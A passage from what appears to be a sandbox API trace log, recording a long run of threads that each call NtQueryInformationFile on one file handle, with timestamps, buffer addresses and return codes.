IoStatusBlock=0x432fef0, FileInformation=0x44d8098) returned 0x0 Thread: id = 1915 os_tid = 0x344 [0154.895] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x481fd58, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x481fd58, FileInformation=0x44d8098) returned 0x0 Thread: id = 1916 os_tid = 0x808 [0154.897] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x47ff940, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x47ff940, FileInformation=0x44d8098) returned 0x0 Thread: id = 1917 os_tid = 0x858 [0154.898] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x485fe50, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x485fe50, FileInformation=0x44d8098) returned 0x0 Thread: id = 1918 os_tid = 0x224 [0154.900] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x479fa30, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x479fa30, FileInformation=0x44d8098) returned 0x0 Thread: id = 1919 os_tid = 0x4dc [0154.902] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x434fde8, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x434fde8, FileInformation=0x44d8098) returned 0x0 Thread: id = 1920 os_tid = 0x78c [0154.904] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x430fe90, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x430fe90, FileInformation=0x44d8098) returned 0x0 Thread: id = 1921 os_tid = 0xb0 [0154.905] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x434f8e8, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x434f8e8, FileInformation=0x44d8098) returned 0x0 Thread: id = 1922 os_tid = 0x314 [0154.908] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x481fc10, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x481fc10, FileInformation=0x44d8098) returned 0x0 Thread: id = 1923 os_tid = 0x804 [0154.909] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x47dfca0, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x47dfca0, FileInformation=0x44d8098) returned 0x0 Thread: id = 1924 os_tid = 0x854 [0154.911] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x47ffba0, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x47ffba0, FileInformation=0x44d8098) returned 0xc0000010 Thread: id = 1925 os_tid = 0xa78 [0154.913] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x489f868, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x489f868, FileInformation=0x44d8098) returned 0x0 Thread: id = 1926 os_tid = 0x7a8 [0154.914] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x489f7e0, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x489f7e0, FileInformation=0x44d8098) returned 0x0 Thread: id = 1927 os_tid = 0x330 [0154.916] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x489fd58, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x489fd58, FileInformation=0x44d8098) returned 0x0 Thread: id = 1928 os_tid = 0x3a4 [0154.918] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x487ff68, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x487ff68, FileInformation=0x44d8098) returned 0x0 Thread: id = 1929 os_tid = 0x67c [0154.920] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x42efc88, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x42efc88, FileInformation=0x44d8098) returned 0x0 Thread: id = 1930 os_tid = 0x5cc [0154.921] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x477fb68, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x477fb68, FileInformation=0x44d8098) returned 0x0 Thread: id = 1931 os_tid = 0x840 [0154.923] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x479fc48, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x479fc48, FileInformation=0x44d8098) returned 0xc0000002 Thread: id = 1932 os_tid = 0x69c [0154.926] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x297fd50, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x297fd50, FileInformation=0x44d8098) returned 0x0 Thread: id = 1933 os_tid = 0x6f0 [0154.927] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x477fd28, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x477fd28, FileInformation=0x44d8098) returned 0x0 Thread: id = 1934 os_tid = 0x810 [0154.929] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x42ef9a0, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x42ef9a0, FileInformation=0x44d8098) returned 0x0 Thread: id = 1935 os_tid = 0xa88 [0154.931] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x485fc88, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x485fc88, FileInformation=0x44d8098) returned 0x0 Thread: id = 1936 os_tid = 0x43c [0154.932] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x47ffa40, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x47ffa40, FileInformation=0x44d8098) returned 0x0 Thread: id = 1937 os_tid = 0x670 [0154.934] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x432f898, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x432f898, FileInformation=0x44d8098) returned 0x0 Thread: id = 1938 os_tid = 0xa14 [0154.935] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x47dfef0, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x47dfef0, FileInformation=0x44d8098) returned 0x0 Thread: id = 1939 os_tid = 0x990 [0154.937] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x47bfe98, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x47bfe98, FileInformation=0x44d8098) returned 0x0 Thread: id = 1940 os_tid = 0x2dc [0154.939] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x477f9d8, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x477f9d8, FileInformation=0x44d8098) returned 0x0 Thread: id = 1941 os_tid = 0x74c [0154.942] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x489fdd8, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x489fdd8, FileInformation=0x44d8098) returned 0x0 Thread: id = 1942 os_tid = 0x3c4 [0154.943] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x42efe90, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x42efe90, FileInformation=0x44d8098) returned 0x0 Thread: id = 1943 os_tid = 0x90 [0154.945] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x434f7c0, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x434f7c0, FileInformation=0x44d8098) returned 0x0 Thread: id = 1944 os_tid = 0x630 [0154.947] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x477ff80, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x477ff80, FileInformation=0x44d8098) returned 0x0 Thread: id = 1945 os_tid = 0x124 [0154.948] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x299fcc8, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x299fcc8, FileInformation=0x44d8098) returned 0x0 Thread: id = 1946 os_tid = 0xc0 [0154.950] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x42eff20, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x42eff20, FileInformation=0x44d8098) returned 0x0 Thread: id = 1947 os_tid = 0x360 [0154.952] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x47bf840, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x47bf840, FileInformation=0x44d8098) returned 0x0 Thread: id = 1948 os_tid = 0x920 [0154.953] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x434f998, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x434f998, FileInformation=0x44d8098) returned 0x0 Thread: id = 1949 os_tid = 0xbec [0154.955] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x477f9d0, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x477f9d0, FileInformation=0x44d8098) returned 0x0 Thread: id = 1950 os_tid = 0x6b8 [0154.956] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x436fe30, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x436fe30, FileInformation=0x44d8098) returned 0x0 Thread: id = 1951 os_tid = 0x30c [0154.958] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x479fdb0, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x479fdb0, FileInformation=0x44d8098) returned 0xc0000003 Thread: id = 1952 os_tid = 0xbfc [0154.959] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x434fe28, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x434fe28, FileInformation=0x44d8098) returned 0x0 Thread: id = 1953 os_tid = 0x3f8 [0154.961] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x477fb80, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x477fb80, FileInformation=0x44d8098) returned 0xc0000003 Thread: id = 1954 os_tid = 0x6cc [0154.962] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x299f918, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x299f918, FileInformation=0x44d8098) returned 0xc0000002 Thread: id = 1955 os_tid = 0x830 [0154.965] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x485f790, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x485f790, FileInformation=0x44d8098) returned 0xc0000010 Thread: id = 1956 os_tid = 0x75c [0154.967] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x436ff70, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x436ff70, FileInformation=0x44d8098) returned 0x0 Thread: id = 1957 os_tid = 0x7f0 [0154.968] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x436f7e8, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x436f7e8, FileInformation=0x44d8098) returned 0x0 Thread: id = 1958 os_tid = 0x710 [0154.971] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x479f850, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x479f850, FileInformation=0x44d8098) returned 0xc0000003 Thread: id = 1959 os_tid = 0x5d8 [0154.973] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x479f840, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x479f840, FileInformation=0x44d8098) returned 0xc0000010 Thread: id = 1960 os_tid = 0xbe4 [0154.974] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x47dfcb8, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x47dfcb8, FileInformation=0x44d8098) returned 0xc0000010 Thread: id = 1961 os_tid = 0x600 [0154.976] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x487fb20, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x487fb20, FileInformation=0x44d8098) returned 0xc0000010 Thread: id = 1962 os_tid = 0xbd0 [0154.977] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x481fef8, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x481fef8, FileInformation=0x44d8098) returned 0xc0000010 Thread: id = 1963 os_tid = 0x158 [0154.979] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x434fcc0, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x434fcc0, FileInformation=0x44d8098) returned 0xc0000010 Thread: id = 1964 os_tid = 0xbd8 [0154.980] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x436f950, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x436f950, FileInformation=0x44d8098) returned 0xc0000010 Thread: id = 1965 os_tid = 0xbe8 [0154.982] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x481f8f0, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x481f8f0, FileInformation=0x44d8098) returned 0x0 Thread: id = 1966 os_tid = 0xbdc [0154.984] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x47bf7c8, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x47bf7c8, FileInformation=0x44d8098) returned 0xc0000010 Thread: id = 1967 os_tid = 0x5b4 [0155.003] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x42ef950, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x42ef950, FileInformation=0x44d8098) returned 0xc0000002 Thread: id = 1968 os_tid = 0x614 [0155.005] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x47ffca0, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x47ffca0, FileInformation=0x44d8098) returned 0xc0000003 Thread: id = 1969 os_tid = 0x690 [0155.007] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x489f960, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x489f960, FileInformation=0x44d8098) returned 0x0 Thread: id = 1970 os_tid = 0xa68 [0155.010] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x42efd98, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x42efd98, FileInformation=0x44d8098) returned 0xc0000003 Thread: id = 1971 os_tid = 0x7d0 [0155.011] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x483f958, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x483f958, FileInformation=0x44d8098) returned 0xc0000010 Thread: id = 1972 os_tid = 0x7d8 [0155.013] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x479f988, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x479f988, FileInformation=0x44d8098) returned 0x0 Thread: id = 1973 os_tid = 0x24c [0155.019] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x430fcd0, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x430fcd0, FileInformation=0x44d8098) returned 0x0 Thread: id = 1974 os_tid = 0x9f8 [0155.021] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x297f818, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x297f818, FileInformation=0x44d8098) returned 0x0 Thread: id = 1975 os_tid = 0x798 [0155.023] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x436fe88, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x436fe88, FileInformation=0x44d8098) returned 0xc0000003 Thread: id = 1976 os_tid = 0xa3c [0155.024] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x42efb40, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x42efb40, FileInformation=0x44d8098) returned 0x0 Thread: id = 1977 os_tid = 0x8c0 [0155.026] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x47ffbb8, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x47ffbb8, FileInformation=0x44d8098) returned 0x0 Thread: id = 1978 os_tid = 0x700 [0155.027] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x47ffd80, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x47ffd80, FileInformation=0x44d8098) returned 0x0 Thread: id = 1979 os_tid = 0x708 [0155.029] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x489f9c0, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x489f9c0, FileInformation=0x44d8098) returned 0x0 Thread: id = 1980 os_tid = 0xa64 [0155.031] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x47ffad0, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x47ffad0, FileInformation=0x44d8098) returned 0x0 Thread: id = 1981 os_tid = 0xa30 [0155.033] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x47bf930, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x47bf930, FileInformation=0x44d8098) returned 0x0 Thread: id = 1982 os_tid = 0x388 [0155.035] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x434fec0, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x434fec0, FileInformation=0x44d8098) returned 0x0 Thread: id = 1983 os_tid = 0x760 [0155.036] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x47dff50, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x47dff50, FileInformation=0x44d8098) returned 0x0 Thread: id = 1984 os_tid = 0xa54 [0155.038] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x42efca8, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x42efca8, FileInformation=0x44d8098) returned 0x0 Thread: id = 1985 os_tid = 0x738 [0155.039] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x487f7f0, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x487f7f0, FileInformation=0x44d8098) returned 0x0 Thread: id = 1986 os_tid = 0x488 [0155.041] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x485fab8, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x485fab8, FileInformation=0x44d8098) returned 0x0 Thread: id = 1987 os_tid = 0x6dc [0155.042] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x436fc48, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x436fc48, FileInformation=0x44d8098) returned 0x0 Thread: id = 1988 os_tid = 0x7a0 [0155.044] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x483fde0, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x483fde0, FileInformation=0x44d8098) returned 0x0 Thread: id = 1989 os_tid = 0x73c [0155.046] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x430f838, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x430f838, FileInformation=0x44d8098) returned 0x0 Thread: id = 1990 os_tid = 0x1c0 [0155.048] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x48bfb98, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x48bfb98, FileInformation=0x44d8098) returned 0x0 Thread: id = 1991 os_tid = 0x7c4 [0155.049] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x483ff08, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x483ff08, FileInformation=0x44d8098) returned 0x0 Thread: id = 1992 os_tid = 0x790 [0155.052] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x477fba8, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x477fba8, FileInformation=0x44d8098) returned 0x0 Thread: id = 1993 os_tid = 0x688 [0155.054] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x432f7d0, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x432f7d0, FileInformation=0x44d8098) returned 0x0 Thread: id = 1994 os_tid = 0x240 [0155.055] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x432fb50, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x432fb50, FileInformation=0x44d8098) returned 0x0 Thread: id = 1995 os_tid = 0x8e0 [0155.057] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x485fe88, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x485fe88, FileInformation=0x44d8098) returned 0x0 Thread: id = 1996 os_tid = 0x880 [0155.059] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x485f990, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x485f990, FileInformation=0x44d8098) returned 0x0 Thread: id = 1997 os_tid = 0x8f0 [0155.061] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x481fe20, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x481fe20, FileInformation=0x44d8098) returned 0x0 Thread: id = 1998 os_tid = 0xa18 [0155.062] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x432fe10, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x432fe10, FileInformation=0x44d8098) returned 0x0 Thread: id = 1999 os_tid = 0x8a0 [0155.065] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x485fc88, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x485fc88, FileInformation=0x44d8098) returned 0x0 Thread: id = 2000 os_tid = 0x870 [0155.066] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x436ff30, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x436ff30, FileInformation=0x44d8098) returned 0x0 Thread: id = 2001 os_tid = 0x2c4 [0155.068] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x432fa70, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x432fa70, FileInformation=0x44d8098) returned 0x0 Thread: id = 2002 os_tid = 0x890 [0155.069] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x42efb88, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x42efb88, FileInformation=0x44d8098) returned 0x0 Thread: id = 2003 os_tid = 0x4e8 [0155.071] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x432fdc0, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x432fdc0, FileInformation=0x44d8098) returned 0x0 Thread: id = 2004 os_tid = 0xcc [0155.072] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x430fbd8, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x430fbd8, FileInformation=0x44d8098) returned 0x0 Thread: id = 2005 os_tid = 0xd0 [0155.074] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x430fcd0, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x430fcd0, FileInformation=0x44d8098) returned 0x0 Thread: id = 2006 os_tid = 0xd4 [0155.076] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x432f960, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x432f960, FileInformation=0x44d8098) returned 0x0 Thread: id = 2007 os_tid = 0xd8 [0155.077] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x434fe68, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x434fe68, FileInformation=0x44d8098) returned 0x0 Thread: id = 2008 os_tid = 0xdc [0155.079] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x47bfd00, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x47bfd00, FileInformation=0x44d8098) returned 0x0 Thread: id = 2009 os_tid = 0xe0 [0155.080] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x487fc50, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x487fc50, FileInformation=0x44d8098) returned 0x0 Thread: id = 2010 os_tid = 0xe4 [0155.082] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x47bfac0, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x47bfac0, FileInformation=0x44d8098) returned 0x0 Thread: id = 2011 os_tid = 0xe8 [0155.084] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x436fcd0, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x436fcd0, FileInformation=0x44d8098) returned 0x0 Thread: id = 2012 os_tid = 0xec [0155.085] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x47bfb08, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x47bfb08, FileInformation=0x44d8098) returned 0x0 Thread: id = 2013 os_tid = 0x748 [0155.087] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x42eff48, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x42eff48, FileInformation=0x44d8098) returned 0x0 Thread: id = 2014 os_tid = 0xc4 [0155.088] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x42efcc8, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x42efcc8, FileInformation=0x44d8098) returned 0x0 Thread: id = 2015 os_tid = 0x620 [0155.090] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x299f898, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x299f898, FileInformation=0x44d8098) returned 0x0 Thread: id = 2016 os_tid = 0x910 [0155.091] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x436fce8, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x436fce8, FileInformation=0x44d8098) returned 0x0 Thread: id = 2017 os_tid = 0x950 [0155.093] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x477fc90, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x477fc90, FileInformation=0x44d8098) returned 0x0 Thread: id = 2018 os_tid = 0x940 [0155.096] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x434f788, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x434f788, FileInformation=0x44d8098) returned 0x0 Thread: id = 2019 os_tid = 0x980 [0155.097] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x47bfcf0, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x47bfcf0, FileInformation=0x44d8098) returned 0x0 Thread: id = 2020 os_tid = 0xa10 [0155.099] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x434fba0, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x434fba0, FileInformation=0x44d8098) returned 0x0 Thread: id = 2021 os_tid = 0x72c [0155.100] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x487fec0, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x487fec0, FileInformation=0x44d8098) returned 0x0 Thread: id = 2022 os_tid = 0x9e0 [0155.103] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x436f7f0, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x436f7f0, 